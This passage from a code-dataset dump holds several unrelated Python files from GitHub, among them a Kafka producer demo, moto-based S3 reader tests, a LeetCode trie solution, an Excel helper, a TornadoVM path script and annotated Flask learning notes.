...\n\nprint(f\"Same! {packit.add(2,3)} == {module.add(2,3)}\")\n# Calling add from module topmod in package Packit ...\n# Calling add from module topmod in package Packit ...\n# Same! 5 == 5\n\nprint(f\"Module only: flag == {module.TOPMODFLAG}\")\n# Module only: flag == 1\n\nfrom packit import subpack as farm\n# Loading subpackage subpack from package Packit ...\n\nfarm.dog\n# 'The dog goes woof'\n\nbarn = farm.Barn(2) # holds 2 animals, currently empty\nbarn.add(farm.cow)\nbarn.add(farm.sheep)\nprint(barn)\n# Barn(2, 2)\n\nbarn.add(farm.dog)\n# ValueError: cannot add animal, barn at capacity","repo_name":"bryangoodrich/python-exercises","sub_path":"code/0059/0059.py","file_name":"0059.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"22516073409","text":"from confluent_kafka import Producer\n\n\ndef callback(err, msg):\n if err is not None:\n print(f'Message deliver failed: {err}')\n else:\n print(f'Message delivered to {msg.topic()} [{msg.partition()}]')\n\n\np = Producer({\n 'bootstrap.servers': 'localhost:9092',\n # With linger.ms=0 (default),\n # Kafka producer sends messages immediately, even if there is additional unused space in the buffer.\n 'linger.ms': '20',\n # Python producer has different value of default batch size. \n # Default value in confluent doc is 16384(16KB). \n # But with batch.size given expliciply with 16384, batch size from callback log is different\n 'batch.size': '32768', # 32KB\n 'compression.type': 'snappy'\n})\n\n\nfor i in range(100000):\n # You need to call poll() at regular intervals to serve the producer's delivery report callbacks.\n # Without poll(), all callback is queued (internal Queue) until flush method is executed.\n # In case of large # of messages, the queue can be full, 'BufferError: Local: Queue full' can occur.\n # poll(0) is a cheap call if nothing needs to be done. Therefore it is typically put in the producer loop\n # When timeout is not 0 (e.g. poll(10)), the process is blocked until any callback is returned or timeout is reached\n\n # Return value of poll() is # of batches sent which is caught by p.poll (Maybe not number of messages...)\n # In case of no key is given,\n # note that in kafka producer with later version, messages are assigned with SAME partition,\n # if a batch of records is not full and has not yet been sent to the broker.\n # https://docs.confluent.io/platform/current/clients/producer.html#concepts\n polling_result = p.poll(0)\n if polling_result:\n print(f'Polling result: {polling_result}')\n p.produce('sample-topic', f'hello world {i}', on_delivery=callback)\n\n# flush(): Waiting for all messages are sent\n# Should be called for application teardown\n# returned value is # of messages not to be sent.\n# With the very short timeout, some message could not be sent.\np.flush()\n\n","repo_name":"fidemin/kafka-python-practice","sub_path":"kafka_producer.py","file_name":"kafka_producer.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25788439398","text":"\"\"\"This module contains utilities\"\"\"\n\ndef tree_layout(tree):\n LINE_SPACE = 2 \n def pos_node(node, px, py, pos):\n i = 0 \n j = 0 \n for i, subnode in enumerate(tree.successors(node)):\n pos_x = px + 1 \n pos_y = py - i*LINE_SPACE - j \n pos[subnode] = (pos_x, pos_y)\n j += pos_node(subnode, pos_x, pos_y, pos)\n return i*LINE_SPACE + j \n\n pos = {}\n pos[tree.rootnode] = (0, 0)\n pos_node(tree.rootnode, 0, 0, pos)\n\n return pos \n\n## BFS\n#def tree_layout(tree):\n# pos = {}\n# pos[tree.rootnode] = (0, 0)\n#\n# queue = [(tree.rootnode, 0, 0)]\n# while queue:\n# vertex, px, py = queue.pop(0)\n# for i, subnode in enumerate(tree.successors(vertex)):\n# pos[subnode] = (px+i, py-1)\n# queue.append((subnode, px+i, py-1))\n#\n# return pos\n\n","repo_name":"danata/danata","sub_path":"danata/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36417775343","text":"import gzip\nimport json\nimport unittest\nimport StringIO\nfrom contextlib import closing\n\nimport boto\nimport mock\nimport datetime\n\nimport dateparser\nimport moto\nfrom exporters.readers.s3_reader import S3Reader, S3BucketKeysFetcher, get_bucket\nfrom exporters.exceptions import ConfigurationError\n\nfrom .utils import meta\n\nNO_KEYS = ['test_list/test_key_1', 'test_list/test_key_2', 'test_list/test_key_3',\n 'test_list/test_key_4', 'test_list/test_key_5', 'test_list/test_key_6',\n 'test_list/test_key_7', 'test_list/test_key_8', 'test_list/test_key_9']\n\nVALID_KEYS = ['test_list/dump_p1_US_a', 'test_list/dump_p1_UK_a', 'test_list/dump_p1_US_b',\n 'test_list/dump_p2_US_a', 'test_list/dump_p1_ES_a', 'test_list/dump_p1_FR_a',\n 'test_list/dump_p_US_a']\n\n\nPOINTER_KEYS = ['pointer1/dump_p1_US_a', 'pointer1/dump_p1_UK_a', 'pointer1/dump_p1_US_b',\n 'pointer2/dump_p2_US_a', 'pointer2/dump_p1_ES_a', 'pointer2/dump_p1_FR_a',\n 'pointer3/dump_p_US_a']\n\n\nclass FakeKey(object):\n def __init__(self, name):\n self.name = name\n self.key = name\n\n def get_contents_as_string(self):\n return json.dumps({'name': self.name})\n\n\ndef get_keys_list(key_list):\n keys = []\n for key_name in key_list:\n keys.append(FakeKey(key_name))\n return keys\n\n\nclass S3ReaderTest(unittest.TestCase):\n def setUp(self):\n self.mock_s3 = moto.mock_s3()\n self.mock_s3.start()\n self.s3_conn = boto.connect_s3()\n self.s3_conn.create_bucket('no_keys_bucket')\n bucket = self.s3_conn.get_bucket('no_keys_bucket')\n for key_name in NO_KEYS:\n key = bucket.new_key(key_name)\n key.set_contents_from_string('')\n key.close()\n\n self.s3_conn.create_bucket('valid_keys_bucket')\n bucket = self.s3_conn.get_bucket('valid_keys_bucket')\n\n for key_name in VALID_KEYS:\n key = bucket.new_key(key_name)\n out = StringIO.StringIO()\n with gzip.GzipFile(fileobj=out, mode='w') as f:\n f.write(json.dumps({'name': key_name}))\n key.set_contents_from_string(out.getvalue())\n key.close()\n\n self.options_no_keys = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 'no_keys_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': 'test_list/',\n 'pattern': 'dump_p(.*)_US_(.*)'\n }\n }\n\n self.options_valid = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 'valid_keys_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': 'test_list/',\n 'pattern': 'dump_p(.*)_US_(.*)'\n }\n }\n\n self.options_no_pattern = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 'valid_keys_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': 'test_list/',\n 'batch_size': 1\n }\n }\n\n self.options_no_prefix = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 'valid_keys_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'pattern': '(.*)dump_p(.*)_US_(.*)'\n }\n }\n\n self.options_prefix_and_prefix_pointer = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 'valid_keys_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': 'test_list/',\n 'prefix_pointer': 'test_list/LAST'\n }\n }\n\n self.options_date_prefix = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 'valid_keys_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': 'test_prefix/%Y-%m-%d'\n }\n }\n\n self.options_dateparser = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 'valid_keys_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': 'test_prefix/%Y-%m-%d',\n 'prefix_format_using_date': 'yesterday'\n }\n }\n\n self.options_dateparser_range_3_days = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 'valid_keys_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': 'test_prefix/%Y-%m-%d',\n 'prefix_format_using_date': ['2 days ago', 'today']\n }\n }\n\n self.options_date_prefix_list = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 'valid_keys_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': ['a_prefix/daily/%Y-%m-%d',\n 'b_prefix/daily/%Y-%m-%d',\n 'c_prefix/daily/%Y-%m-%d']\n }\n }\n\n self.options_prefix_list_using_date = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 'valid_keys_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': ['a_prefix/daily/%Y-%m-%d',\n 'b_prefix/daily/%Y-%m-%d',\n 'c_prefix/daily/%Y-%m-%d'],\n 'prefix_format_using_date': 'yesterday'\n }\n }\n\n self.options_with_invalid_date_range = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 'valid_keys_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': 'test_prefix/%Y-%m-%d',\n 'prefix_format_using_date': ['today', '2 days ago']\n }\n }\n\n self.options_valid_prefix = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 's3://valid_keys_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': 'test_list/',\n 'pattern': 'dump_p(.*)_US_(.*)'\n }\n }\n\n self.options_valid_prefix_and_suffix = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 's3://valid_keys_bucket/',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': 'test_list/',\n 'pattern': 'dump_p(.*)_US_(.*)'\n }\n }\n\n def tearDown(self):\n self.mock_s3.stop()\n\n def test_list_no_keys(self):\n reader = S3Reader(self.options_no_keys, meta())\n self.assertEqual([], reader.keys)\n\n def test_list_keys(self):\n reader = S3Reader(self.options_valid, meta())\n expected = ['test_list/dump_p1_US_a', 'test_list/dump_p1_US_b',\n 'test_list/dump_p2_US_a', 'test_list/dump_p_US_a']\n self.assertEqual(expected, reader.keys)\n\n def test_list_keys_prefix(self):\n reader = S3Reader(self.options_valid, meta())\n expected = ['test_list/dump_p1_US_a', 'test_list/dump_p1_US_b',\n 'test_list/dump_p2_US_a', 'test_list/dump_p_US_a']\n self.assertEqual(expected, reader.keys)\n\n def test_list_keys_prefix_and_suffix(self):\n reader = S3Reader(self.options_valid, meta())\n expected = ['test_list/dump_p1_US_a', 'test_list/dump_p1_US_b',\n 'test_list/dump_p2_US_a', 'test_list/dump_p_US_a']\n self.assertEqual(expected, reader.keys)\n\n def test_no_pattern_keys(self):\n reader = S3Reader(self.options_no_pattern, meta())\n expected = ['test_list/dump_p1_ES_a', 'test_list/dump_p1_FR_a',\n 'test_list/dump_p1_UK_a', 'test_list/dump_p1_US_a',\n 'test_list/dump_p1_US_b', 'test_list/dump_p2_US_a',\n 'test_list/dump_p_US_a']\n self.assertEqual(expected, reader.keys)\n\n def test_no_prefix_list_keys(self):\n reader = S3Reader(self.options_no_prefix, meta())\n expected = ['test_list/dump_p1_US_a', 'test_list/dump_p1_US_b',\n 'test_list/dump_p2_US_a', 'test_list/dump_p_US_a']\n self.assertEqual(expected, reader.keys)\n\n def test_prefix_and_prefix_pointer_list_keys(self):\n self.assertRaises(ConfigurationError, S3Reader,\n self.options_prefix_and_prefix_pointer, meta())\n\n def test_get_batch(self):\n reader = S3Reader(self.options_no_pattern, meta())\n reader.set_last_position(None)\n batch = list(reader.get_next_batch())\n expected_batch = [{u'name': u'test_list/dump_p1_ES_a'}]\n self.assertEqual(batch, expected_batch)\n\n def test_date_prefix(self):\n reader = S3Reader(self.options_date_prefix, meta())\n expected = [datetime.datetime.now().strftime('test_prefix/%Y-%m-%d')]\n self.assertEqual(expected, reader.keys_fetcher.prefixes)\n\n def test_date_prefix_yesterday(self):\n reader = S3Reader(self.options_dateparser, meta())\n yesterday = dateparser.parse('yesterday').strftime('%Y-%m-%d')\n expected = ['test_prefix/{yesterday}'.format(yesterday=yesterday)]\n self.assertEqual(expected, reader.keys_fetcher.prefixes)\n\n def test_date_range_prefixes(self):\n reader = S3Reader(self.options_dateparser_range_3_days, meta())\n expected = ['test_prefix/{}'.format(dateparser.parse('2 days ago').strftime('%Y-%m-%d')),\n 'test_prefix/{}'.format(dateparser.parse('yesterday').strftime('%Y-%m-%d')),\n 'test_prefix/{}'.format(dateparser.parse('today').strftime('%Y-%m-%d'))]\n self.assertEqual(expected, reader.keys_fetcher.prefixes)\n\n def test_date_prefix_list(self):\n reader = S3Reader(self.options_date_prefix_list, meta())\n today = datetime.datetime.now().strftime('%Y-%m-%d')\n expected = ['a_prefix/daily/{}'.format(today),\n 'b_prefix/daily/{}'.format(today),\n 'c_prefix/daily/{}'.format(today)]\n self.assertEqual(expected, reader.keys_fetcher.prefixes)\n\n def test_prefix_list_using_date(self):\n reader = S3Reader(self.options_prefix_list_using_date, meta())\n yesterday = dateparser.parse('yesterday').strftime('%Y-%m-%d')\n expected = ['a_prefix/daily/{}'.format(yesterday),\n 'b_prefix/daily/{}'.format(yesterday),\n 'c_prefix/daily/{}'.format(yesterday)]\n self.assertEqual(expected, reader.keys_fetcher.prefixes)\n\n def test_get_read_streams(self):\n with closing(S3Reader(self.options_valid, meta())) as reader:\n file_names = set(['test_list/dump_p1_US_a', 'test_list/dump_p1_US_b',\n 'test_list/dump_p2_US_a', 'test_list/dump_p_US_a'])\n streams = list(reader.get_read_streams())\n for stream_data, file_name in zip(streams, file_names):\n name, size, _ = stream_data\n assert name in file_names\n file_names.remove(name)\n assert file_names == set()\n\n def test_invalid_date_range(self):\n self.assertRaisesRegexp(ConfigurationError,\n 'The end date should be greater or equal to '\n 'the start date for the '\n 'prefix_format_using_date option',\n S3Reader,\n self.options_with_invalid_date_range, meta())\n\n def test_read_compressed_file(self):\n self.s3_conn.create_bucket('compressed_files')\n bucket = self.s3_conn.get_bucket('compressed_files')\n key = bucket.new_key('test/dummy_data.gz')\n key.set_contents_from_filename('tests/data/dummy_data.jl.gz')\n key.close()\n\n options = {\n 'name': 'exporters.readers.s3_reader.S3Reader',\n 'options': {\n 'bucket': 'compressed_files',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix': 'test/',\n 'pattern': 'dummy_data(.*)'\n }\n }\n\n reader = S3Reader(options, meta())\n reader.set_last_position(None)\n batch = reader.get_next_batch()\n self.assertEqual(len(list(batch)), 200, 'Wrong items number read')\n\n\nclass TestS3BucketKeysFetcher(unittest.TestCase):\n\n def setUp(self):\n self.mock_s3 = moto.mock_s3()\n self.mock_s3.start()\n self.s3_conn = boto.connect_s3()\n self.s3_conn.create_bucket('last_bucket')\n bucket = self.s3_conn.get_bucket('last_bucket')\n key = bucket.new_key('test_list/LAST')\n self.pointers = ['pointer1', 'pointer2', 'pointer3', '']\n key.set_contents_from_string('\\r\\n'.join(self.pointers))\n key.close()\n\n for key_name in POINTER_KEYS:\n key = bucket.new_key(key_name)\n out = StringIO.StringIO()\n with gzip.GzipFile(fileobj=out, mode='w') as f:\n f.write(json.dumps({'name': key_name}))\n key.set_contents_from_string(out.getvalue())\n key.close()\n\n self.options_prefix_pointer = {\n 'bucket': 'last_bucket',\n 'aws_access_key_id': 'KEY',\n 'aws_secret_access_key': 'SECRET',\n 'prefix_pointer': 'test_list/LAST'\n }\n\n def test_prefix_pointer_list(self):\n self.s3_conn.create_bucket('last_bucket')\n expected_pointers = ['pointer1', 'pointer2', 'pointer3']\n fetcher = S3BucketKeysFetcher(self.options_prefix_pointer, 'KEY', 'SECRET')\n self.assertEqual(expected_pointers, fetcher.prefixes)\n\n def test_prefix_pointer_keys_list(self):\n fetcher = S3BucketKeysFetcher(self.options_prefix_pointer, 'KEY', 'SECRET')\n self.assertEqual(set(POINTER_KEYS), set(fetcher.pending_keys()))\n\n\nclass GetBucketTest(unittest.TestCase):\n def setUp(self):\n self.mock_s3 = moto.mock_s3()\n self.mock_s3.start()\n self.s3_conn = boto.connect_s3()\n self.s3_conn.create_bucket('fake_bucket')\n\n def tearDown(self):\n self.mock_s3.stop()\n\n @mock.patch('boto.s3.connection.S3Connection.get_bucket')\n def test_get_bucket_with_limited_access(self, mock_get_bucket):\n import boto.s3.bucket\n\n def reject_validated_get_bucket(*args, **kwargs):\n if kwargs.get('validate', True):\n raise boto.exception.S3ResponseError(\"Fake Error\", \"Permission Denied\")\n\n bucket = mock.Mock(spec=boto.s3.bucket.Bucket)\n bucket.name = 'bucket_name'\n return bucket\n\n mock_get_bucket.side_effect = reject_validated_get_bucket\n\n get_bucket('some_bucket', 'fake-access-key', 'fake-secret-key')\n","repo_name":"scrapinghub/exporters","sub_path":"tests/test_readers_s3.py","file_name":"test_readers_s3.py","file_ext":"py","file_size_in_byte":15641,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"52"} +{"seq_id":"31427879315","text":"from six.moves.BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer\nfrom threading import Thread\nimport os\nimport requests\nimport socket\nimport time\n\nhandle_request_cache = dict()\n\n\nclass MockServerRequestHandler(BaseHTTPRequestHandler):\n\n def handle_request(self, method, path):\n handle = handle_request_cache.get((method, path))\n if not handle:\n raise Exception(\n \"Mock server called with unknown request {} {}\".format(method, path))\n\n handle(self)\n\n def do_GET(self): self.handle_request(\"GET\", self.path)\n\n def do_POST(self): self.handle_request(\"POST\", self.path)\n\n # Turn off HTTP logging so they don't interfere with STDOUT for our tests\n def log_message(*args, **kwargs):\n pass\n\n\ndef init_mock_server():\n # Get port\n s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)\n s.bind(('localhost', 0))\n address, port = s.getsockname()\n s.close()\n\n # Start server\n mock_server = HTTPServer(('localhost', port), MockServerRequestHandler)\n mock_server_thread = Thread(target=mock_server.serve_forever)\n mock_server_thread.setDaemon(True)\n mock_server_thread.start()\n\n # Override production server\n server = 'http://localhost:{}'.format(port)\n os.environ['HYPERDASH_SERVER'] = server\n\n return handle_request_cache\n","repo_name":"hyperdashio/hyperdash-sdk-py","sub_path":"tests/mocks.py","file_name":"mocks.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":198,"dataset":"github-code","pt":"52"} +{"seq_id":"37286066988","text":"#\n# @lc app=leetcode id=677 lang=python3\n#\n# [677] Map Sum Pairs\n#\n# https://leetcode.com/problems/map-sum-pairs/description/\n#\n# algorithms\n# Medium (51.85%)\n# Likes: 318\n# Dislikes: 61\n# Total Accepted: 28.3K\n# Total Submissions: 54.3K\n# Testcase Example: '[\"MapSum\", \"insert\", \"sum\", \"insert\", \"sum\"]\\n' +\n#\n# \n# Implement a MapSum class with insert, and sum methods.\n# \n# \n# \n# For the method insert, you'll be given a pair of (string, integer). The\n# string represents the key and the integer represents the value. If the key\n# already existed, then the original key-value pair will be overridden to the\n# new one.\n# \n# \n# \n# For the method sum, you'll be given a string representing the prefix, and you\n# need to return the sum of all the pairs' value whose key starts with the\n# prefix.\n# \n# \n# Example 1:\n# \n# Input: insert(\"apple\", 3), Output: Null\n# Input: sum(\"ap\"), Output: 3\n# Input: insert(\"app\", 2), Output: Null\n# Input: sum(\"ap\"), Output: 5\n# \n# \n# \n#\nfrom collections import Counter\n\n# O(K^2) for prefix hashmap insert, O(1) sum\n# O(K) for Trie insert and sum\n\nclass TrieNode:\n __slots__ = \"children\", \"score\"\n def __init__(self):\n self.children = {}\n self.score = 0\n\nclass MapSum:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n # self.map = {}\n # self.score = Counter()\n\n self.map = {}\n self.root = TrieNode()\n \n\n def insert(self, key: str, val: int) -> None:\n # delta = val - self.map.get(key, 0)\n # self.map[key] = val\n # for i in range(len(key)+1):\n # prefix = key[:i]\n # self.score[prefix] += delta\n\n delta = val - self.map.get(key, 0)\n self.map[key] = val\n cur = self.root\n cur.score += delta\n for char in key:\n cur = cur.children.setdefault(char, TrieNode())\n cur.score += delta\n \n def sum(self, prefix: str) -> int:\n # return self.score[prefix]\n\n cur = self.root\n for char in prefix:\n if char not in cur.children:\n return 0\n cur = cur.children[char]\n return cur.score\n \n\n\n# Your MapSum object will be instantiated and called as such:\n# obj = MapSum()\n# obj.insert(key,val)\n# param_2 = obj.sum(prefix)\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"677.map-sum-pairs.py","file_name":"677.map-sum-pairs.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"19579394935","text":"\n# Bucle for \n# Este programa genera una fila de cubos con el bucle for\nb=0\nfor objeto in [1,2,3,4,5,6,7]:\n #el cuerpo del bucle\n cube = cmds.polyCube(w=0.9)\n cmds.move(b,0,0, cube[0])\n b = b+1\n\n\n\n## \n# Este programa genera una fila de cubos con un rango de 0 a 100\nrango = range(100)\nprint (rango)\n\nb=0\nfor objeto in rango:\n #el cuerpo del bucle\n cube = cmds.polyCube(w=0.9)\n cmds.move(b,0,0, cube[0])\n b = b+1\n \n## \n# Bucle while \n##\n\nb = 0\nwhile b<10:\n print (b)\n b=b+1","repo_name":"RooWiki/love_letters_written_in_python_for_maya","sub_path":"BucleForBucleWhile.py","file_name":"BucleForBucleWhile.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31461353500","text":"# coding:utf-8\nfrom openpyxl import load_workbook,Workbook\nimport openpyxl\n\n\ndef copy_excel(excelpath1, excelpath2):\n '''复制excek,把excelpath1数据复制到excelpath2'''\n wb2 = openpyxl.Workbook()\n wb2.save(excelpath2)\n # 读取数据\n wb1 = openpyxl.load_workbook(excelpath1)\n wb2 = openpyxl.load_workbook(excelpath2)\n sheets1 = wb1.sheetnames\n sheets2 = wb2.sheetnames\n sheet1 = wb1[sheets1[0]]\n sheet2 = wb2[sheets2[0]]\n max_row = sheet1.max_row # 最大行数\n max_column = sheet1.max_column # 最大列数\n\n for m in list(range(1,max_row+1)):\n for n in list(range(97,97+max_column)): # chr(97)='a'\n n = chr(n) # ASCII字符\n i ='%s%d'% (n, m) # 单元格编号\n cell1 = sheet1[i].value # 获取data单元格数据\n sheet2[i].value = cell1 # 赋值到test单元格\n\n wb2.save(excelpath2) # 保存数据\n wb1.close() # 关闭excel\n wb2.close()\n\nclass Write_excel(object):\n '''修改excel数据'''\n def __init__(self, filename):\n self.filename = filename\n self.wb = load_workbook(self.filename)\n self.ws = self.wb.active # 激活sheet\n self.sheetnames = self.wb.get_sheet_names() # 获得表单名字\n\n def write(self, row_n, col_n, value):\n '''写入数据,如(2,3,\"hello\"),第二行第三列写入数据\"hello\"'''\n self.ws.cell(row=row_n, column=col_n).value = value # 写入Excel\n self.wb.save(self.filename)\n\n def read1(self, row_n, col_n):\n \"\"\"读取数据 row_n = 1 读取第一行, col_n=5 第五列\"\"\"\n self.sheet = self.wb.get_sheet_by_name(self.sheetnames[0])\n return self.sheet.cell(row=row_n, column=col_n).value\n\nif __name__ == \"__main__\":\n # copy_excel(\"debug_api.xlsx\", \"test115.xlsx\")\n wt = Write_excel(r\"D:/Workspace/InterfaceTestFramework/data/TestCase.xlsx\")\n tt = {\"er\": '5',\"e\":'34'}\n try:\n wt.write(2, 2, \"test\")\n wt.write(2, 3, \"HELLEOP\")\n print(wt.read1(2,2))\n print(wt.read1(2,3))\n except ValueError:\n print(\"写入Excel的值错误,错误为:{}\".format(ValueError))\n except Exception as msg:\n print(\"不可预知的错误:{}\".format(msg))\n","repo_name":"StalloneYang/InterfaceTestFramework","sub_path":"framework/writeexcel.py","file_name":"writeexcel.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20477911519","text":"import os\nimport subprocess\n\n\ndef update_tornado_paths():\n \"\"\"\n Update PATH and TORNADO_SDK symbolic links to the latest Tornado SDK.\n\n This function determines the latest Tornado SDK in the 'dist/tornado-sdk/' directory\n and updates the symbolic links 'bin' and 'sdk' to point to the latest SDK version.\n\n :raises FileNotFoundError: If no files are found in 'dist/tornado-sdk/' directory.\n \"\"\"\n tornado_sdk_dir = \"dist/tornado-sdk/\"\n files_in_sdk_dir = os.listdir(tornado_sdk_dir)\n if files_in_sdk_dir:\n file = files_in_sdk_dir[0]\n else:\n raise FileNotFoundError(\"No files found in 'dist/tornado-sdk/' directory\")\n\n log_messages = [] # Create an empty list to store log messages\n\n log_messages.append(\n \"###########################################################################\"\n )\n log_messages.append(\"\\x1b[32mTornado build success\\x1b[39m\")\n log_messages.append(f\"Updating PATH and TORNADO_SDK to {file}\")\n\n # Change to the 'bin/' directory\n os.chdir(\"bin/\")\n\n try:\n # Get the commit hash\n commit = subprocess.check_output(\n [\"git\", \"rev-parse\", \"--short\", \"HEAD\"], universal_newlines=True\n ).strip()\n log_messages.append(f\"Commit : {commit}\")\n except subprocess.CalledProcessError:\n log_messages.append(\"Warning: Unable to retrieve commit hash.\")\n\n # Remove existing 'bin' and 'sdk' directories\n for symlink in [\"bin\", \"sdk\"]:\n if os.path.islink(symlink):\n os.unlink(symlink)\n elif os.path.isdir(symlink):\n try:\n os.rmdir(symlink)\n except:\n import shutil\n\n shutil.rmtree(symlink)\n\n # Change back to the parent directory\n os.chdir(\"..\")\n\n # Create symbolic links 'bin' and 'sdk'\n os.symlink(os.path.join(os.getcwd(), tornado_sdk_dir, file, \"bin/\"), \"bin/bin\")\n os.symlink(os.path.join(os.getcwd(), tornado_sdk_dir, file), \"bin/sdk\")\n\n log_messages.append(\n \"###########################################################################\"\n )\n\n # Print all log messages at the end\n for message in log_messages:\n print(message)\n\n\nif __name__ == \"__main__\":\n update_tornado_paths()\n","repo_name":"ShAlireza/TornadoVM","sub_path":"bin/update_paths.py","file_name":"update_paths.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"17565195481","text":"# -*- coding:utf-8 -*-\n# Create by 27\n# @Time : 2020/2/20 21:48\n__author__ = '27'\nfrom flask import Flask, make_response\n# from config import DEBUG\n\napp = Flask(__name__)\n# from_object需要接收一个模块的路径,指出配置文件与该文件的相对路径即可,引入之后,可以把上面的from import语句注释掉了\napp.config.from_object('config')\n'''\n如果在config文件里把DEBUG写成Debug,我用print(app.config['DEBUG'])会打印出False\n\n我用print(app.config['Debug'])来打印,却出错了:\nTraceback (most recent call last):\n File \"learn_flask_线程隔离知识.py\", line 29, in \n print(app.config['Debug'])\nKeyError: 'Debug'\n\n为什么?\n\n下面是from_object的源码:\n if isinstance(obj, string_types):\n obj = import_string(obj)\n for key in dir(obj):\n if key.isupper():\n self[key] = getattr(obj, key)\n然后点进isupper()里面有这样的解释:\nS.isupper() -> bool\n Return True if all cased characters in S are uppercase and there is\n at least one cased character in S, False otherwise.\n意思是所有的字母都是大写的时候,才返回True\n也就是是说,只有在全大写的时候才会为属性的变量名称对应的字典的key设置它所对应的值,\n如果你的config文件中配置项不用全部大写作为配置的变量名的话,那么就不会被设置到Config实例对应的字典中,\n进而,如果你用你设置的变量名作为key来从config读取值的话,肯定是KeyError。\n\n第一个问题,为什么会打印出False?\n基于这个函数的源码,我们知道,你在配置文件里的Debug根本没有放进config的字典里,\n所以这个False是从哪读出来的呢?\n是flask默认的DEBUG参数就是False,所以我们可以打印出来False\n'''\n\nprint(app.config['DEBUG'])\n\n'''\n在路由后面加斜杠,可以同时匹配用户输入加斜杠和不加斜杠的情况\n!!!!!!!如果run()函数中debug参数没有开启,那么一定要重启服务才生效!!!!!\n原理:\n这是flask做了一次重定向\n在客户端(浏览器)向服务器用url1发送第一次请求后,服务器由于种种原因,\n可能是没有这个url1或者是不想让你访问这个url1,\n会返回给客户端一条状态码为301(永久移动)或者302(临时移动)或者其他30x的消息,3开头的状态码表示重定向,\n告诉客户端,应该使用url2的地址来请求,\n之后客户端再次用url2来向服务器发送请求。\n'''\n# 第一种注册路由的方法\n# @app.route('/hello')\ndef hello1():\n return 'Hello 272727!!!'\n'''\nflask 为什么要做重定向呢?\n因为,如果从第一个url就进入请求资源的视图函数,从某种意义上讲违背了唯一url的原则\n唯一url好处是,在被搜索引擎索引的时候,俩url是会被索引两次的,两个url如果对应的资源是一样的,那么完全没有必要。\n关于被索引的问题牵扯seo。\n'''\n\ndef hello2():\n # 函数视图\n '''\n 还会返回status code\n content-type, 放在http header\n 我们的web服务器要告诉客户端如何解析我返回的内容\n 如果我们不指定,默��会把content-type设置为text/html\n 所以也就是为什么我们要是返回页面上什么都不显示\n '''\n # 返回普通字符串\n # headers = {\n # 'content-type': 'text/plain'\n # }\n # response = make_response('', 404) # 状态码只是标识,不会对返回的内容产生实质的影响。\n\n # 重定向尝试\n # headers = {\n # 'content-type': 'text/plain',\n # 'location': 'http://www.bing.com'\n # }\n # response = make_response('', 301)\n\n # 比如给小程序或者别的应用提供接口,返回json数据\n headers = {\n 'content-type': 'application/json'\n }\n # response = make_response({'123': 123}, 200)\n # response.headers = headers\n # return response\n # 最快速的方法,无需构造headers对象:\n return {'abc': 123}, 200, headers\n # return ''\n\n# 